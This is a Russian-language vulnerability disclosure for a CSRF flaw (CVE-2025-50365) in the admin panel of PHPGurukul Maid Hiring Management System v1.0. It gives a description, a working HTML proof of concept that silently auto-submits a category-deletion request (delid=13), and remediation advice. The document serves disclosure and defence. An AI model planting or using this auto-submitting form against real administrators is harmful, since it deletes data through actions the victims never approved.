
PoC для CVE-2025-50365: CSRF-уязвимость в PHPGurukul Maid Hiring Management System, позволяющая удаление категорий найма через специально созданный запрос администратора.
Название проекта и URL репозитория: Система управления наймом горничных на PHP и MySQL
Тип уязвимости: Подделка запроса на стороне клиента (Client Side Request Forgery)
Затронутая(ые) версия(и): v1.0
💣Описание уязвимости: Уязвимость межсайтовой подделки запроса (CSRF) существует в панели администратора PHPGurukul Hiring Management System, что позволяет злоумышленнику удалять произвольные категории найма, обманом заставляя аутентифицированного администратора посетить вредоносный сайт. Это может привести к удалению данных и несанкционированным изменениям на уровне администратора.
👩💻Воздействие: Несанкционированное удаление категорий.
🛜Доказательство концепции (PoC):

/admin/manage-category.php
CSRF-POC<html>
<body>
<form action="http://127.0.0.1/mhms/admin/manage-category.php">
<input type="hidden" name="delid" value="13" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>


Рекомендация: Внедрение CSRF-токенов в формы администратора, применение файлов cookie с атрибутом SameSite и проверка источника запроса для предотвращения несанкционированных действий.